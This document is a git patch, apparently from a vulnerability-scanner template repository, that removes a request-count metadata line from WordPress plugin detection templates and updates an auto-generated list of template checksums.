1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 2758e3d72359e7c594ce8019464632bed1735aa5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 6 Jul 2023 05:17:31 +0000 Subject: [PATCH 394/609] Auto Generated Templates Checksum [Thu Jul 6 05:17:31 UTC 2023] :robot: --- templates-checksum.txt | 428 ++++++++++++++++++++--------------------- 1 file changed, 214 insertions(+), 214 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 72eacdd63d..0a8be95a50 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -213,7 +213,7 @@ helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:2f42d9eff165ff903900a0f helpers/wordpress/plugins/cloudflare.txt:90e21e6589c03430b25fc4c525c14a0d6aff8619 helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 helpers/wordpress/plugins/coblocks.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 -helpers/wordpress/plugins/code-snippets.txt:42aae5955584904bc2d13eabc3cf07107b276398 +helpers/wordpress/plugins/code-snippets.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:60e6b29cae222d0ccf5641a7ebe9d778961c2629 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf @@ -242,7 +242,7 @@ helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5 helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:e3b1c874b07e920f5092b34238b539c29b1e3578 helpers/wordpress/plugins/ewww-image-optimizer.txt:47c3ed69e5609d2452fff4d1fa775f2f0aaa7d4c -helpers/wordpress/plugins/facebook-for-woocommerce.txt:7426d695a30092738382fce59a78dd77be5bfc39 +helpers/wordpress/plugins/facebook-for-woocommerce.txt:fb0eab6a4e5058f591302926ca9d98a794f45601 helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614 helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:98a16af997b52cb888232ab5d79a527b0716561c @@ -250,7 +250,7 @@ helpers/wordpress/plugins/fluentform.txt:a832235a17d232a9abf36075ae469dee7e69ff3 helpers/wordpress/plugins/font-awesome.txt:f4bf33bfd9c3793655f2a19fca0ee1ca41e62e6e helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 helpers/wordpress/plugins/formidable.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 -helpers/wordpress/plugins/forminator.txt:e091c0a7d31789d70b4711b992ca9a2e1e822cea +helpers/wordpress/plugins/forminator.txt:c4ed757432dfd8e67f0e06262c3d56b1657b5f07 helpers/wordpress/plugins/ga-google-analytics.txt:361f82e0e4329314b5ec0ac3b14d43cb15fc0c02 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:b51e37a1939bf22a226cba6aa16aa556b5bdfdf3 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:6b474cdaf13fc941946668ffea3b8a5047fc2c73 @@ -274,7 +274,7 @@ helpers/wordpress/plugins/insert-headers-and-footers.txt:56edf1b708bdabe84569502 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 -helpers/wordpress/plugins/jetpack.txt:d79add1d313daf5c9b7fa689d21d6966e60c2ea0 +helpers/wordpress/plugins/jetpack.txt:01497ce0186ebcac4f56065d58fbd3ce16b01686 helpers/wordpress/plugins/kadence-blocks.txt:5ccd149c585cb813fee3007ec54feb05080f7e34 helpers/wordpress/plugins/kirki.txt:2cbc97154c127c59a298a4207a147a2fff01b48f helpers/wordpress/plugins/leadin.txt:95ba3b4a144f5396717c4b2c6fa194b83d2adea6 @@ -293,10 +293,10 @@ helpers/wordpress/plugins/malcare-security.txt:8a354e6fda90148b0c22992b849e693b1 helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/meta-box.txt:8a4874fdff1ab036389b4739f479332aa0c63551 -helpers/wordpress/plugins/ml-slider.txt:d95eb74054f74c17f26d8fb9735af553bddddade +helpers/wordpress/plugins/ml-slider.txt:01e970f7ce073f9d8e4dadeae00cd5e8a06efc91 helpers/wordpress/plugins/newsletter.txt:abdb334b7c43837f64108a70a2a66817e130b80c helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 -helpers/wordpress/plugins/nextgen-gallery.txt:9144c432d473baecd93eb0985d3874cf3bb6a126 +helpers/wordpress/plugins/nextgen-gallery.txt:f2cc8874a54d8d40b341d84839c1b2984efc0aba helpers/wordpress/plugins/ninja-forms.txt:34235559827d9662bd469f1ccf753f797dce542b helpers/wordpress/plugins/ocean-extra.txt:5f6af51e77b84cd6616d4eaa100a736096568d86 helpers/wordpress/plugins/official-facebook-pixel.txt:c7a799ba251102d32c4623f4036bddb752445f20 @@ -307,7 +307,7 @@ helpers/wordpress/plugins/password-protected.txt:1ff0f47f469eb98d13878242f03511f helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 helpers/wordpress/plugins/photo-gallery.txt:d74e3a7c982dd8d79d90efee159d12d67876affc helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 -helpers/wordpress/plugins/pixelyoursite.txt:d6ec1f7edbdfc1e01ffb78ab8d2025e5ae4a6e8c +helpers/wordpress/plugins/pixelyoursite.txt:e42193e0ae8e59bc06e597280f1767837fb8fa82 helpers/wordpress/plugins/polylang.txt:23d49915eae53800c735cfc0f01c21a9d05e727a helpers/wordpress/plugins/popup-builder.txt:9d6a9d6356ced33784bbde254c46c600df05d71f helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe @@ -337,7 +337,7 @@ helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:d066a99c3f5aa1 helpers/wordpress/plugins/sucuri-scanner.txt:223960ccc78aab169c55e54fb7d9ed6bf1fd29d9 helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 helpers/wordpress/plugins/table-of-contents-plus.txt:40bf252ebc68d2921a7e909064c29fd95a1820fb -helpers/wordpress/plugins/tablepress.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 +helpers/wordpress/plugins/tablepress.txt:c7e3a41454e034e5ad994df8bf12b61e9fb1e1bc helpers/wordpress/plugins/taxonomy-terms-order.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e helpers/wordpress/plugins/the-events-calendar.txt:1d262444e1b31be97e0a0a87e22c14ff2b5da051 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf @@ -381,15 +381,15 @@ helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 -helpers/wordpress/plugins/wp-smushit.txt:9fa03c66ac4ea9ec21b6098ba43e9b00b5292ee0 +helpers/wordpress/plugins/wp-smushit.txt:2ddc3af40d4f8085d3ff3021fcd45eca158663e3 helpers/wordpress/plugins/wp-statistics.txt:2e82474b0edd5bf8921bf46965dbc65a7cbfd3b0 helpers/wordpress/plugins/wp-super-cache.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-user-avatar.txt:06a4c8fb3498a24c86d06fd73d56763fee83924e helpers/wordpress/plugins/wpcf7-recaptcha.txt:e864410c570d87244a122a31198944fa5ab9260e -helpers/wordpress/plugins/wpcf7-redirect.txt:0aaa3cea7451675ff270540e13308210d8fce9ab +helpers/wordpress/plugins/wpcf7-redirect.txt:35fd2c7ac7c4486ea481738632d2b2188a5e0917 helpers/wordpress/plugins/wpforms-lite.txt:868b573d10d425a212e9438804c270d24af5dd12 helpers/wordpress/plugins/wps-hide-login.txt:fa12796bd5aa83d02e53616812c25306cd1d6917 -helpers/wordpress/plugins/wpvivid-backuprestore.txt:49feb32c60e1255682fa64acbf4187f69e8eb071 +helpers/wordpress/plugins/wpvivid-backuprestore.txt:83a35ac526394e5168b118d107d874266be82e5e helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:c1561cd7b973a41baaf95516c020fd65e8656f28 http/cnvd/2017/CNVD-2017-03561.yaml:74103420668209b795d1397008e67affd3e0856c @@ -419,7 +419,7 @@ http/cnvd/2021/CNVD-2021-30167.yaml:0a37c18c7e821a488af40928c89a01a2ad1ee490 http/cnvd/2021/CNVD-2021-49104.yaml:3a25d729d314817f0c9144d7d39a85558b7264dc http/cnvd/2022/CNVD-2022-03672.yaml:694ee5fd18f112ebb2d636c66ce01beaac4286bb http/cnvd/2022/CNVD-2022-42853.yaml:3dae45e305a5f66a69ecc0cb1ccf4d963b29ccb5 -http/cnvd/2022/CNVD-2022-86535.yaml:f53fc86e5a9ae079c739309ba6f2ff6a37c0e775 +http/cnvd/2022/CNVD-2022-86535.yaml:9dd03071fc9795f7ae4d99c59b3fd5342f5a5c70 http/cnvd/2023/CNVD-2023-12632.yaml:ceb1220ec85f8ba6607052d3ab2c9be79bd1a429 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:e265b0ef4cad374b888878d8ebe4cd4bfb3a4c2e @@ -433,7 +433,7 @@ http/credential-stuffing/cloud/gitea-login-check.yaml:06cd8b61171eb7dd4607ef984a http/credential-stuffing/cloud/github-login-check.yaml:6db38de3986e34e5decff0121b9c2cfd91d9026a http/credential-stuffing/cloud/postman-login-check.yaml:52977264ef5a4e68cc844313aef25fe6667b5156 http/credential-stuffing/cloud/pulmi-login-check.yaml:02e294ce7b26d5732d8fc396fc12684e9dea1e4e -http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a00a5b797c9617a291afc620ceb09655c7a17dde +http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a5c13b905ce766747d75254fb82d122c8bbbe70d http/credential-stuffing/self-hosted/grafana-login-check.yaml:3a3891cc6d5dcf12b812bc128a41388883bccc48 http/credential-stuffing/self-hosted/jira-login-check.yaml:906c5a83678bc47a75c5aa5a32925b70d24b804e http/cves/2000/CVE-2000-0114.yaml:af678de88ba0c25c5c699691cbbca26e655ca74c @@ -5344,214 +5344,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 -http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 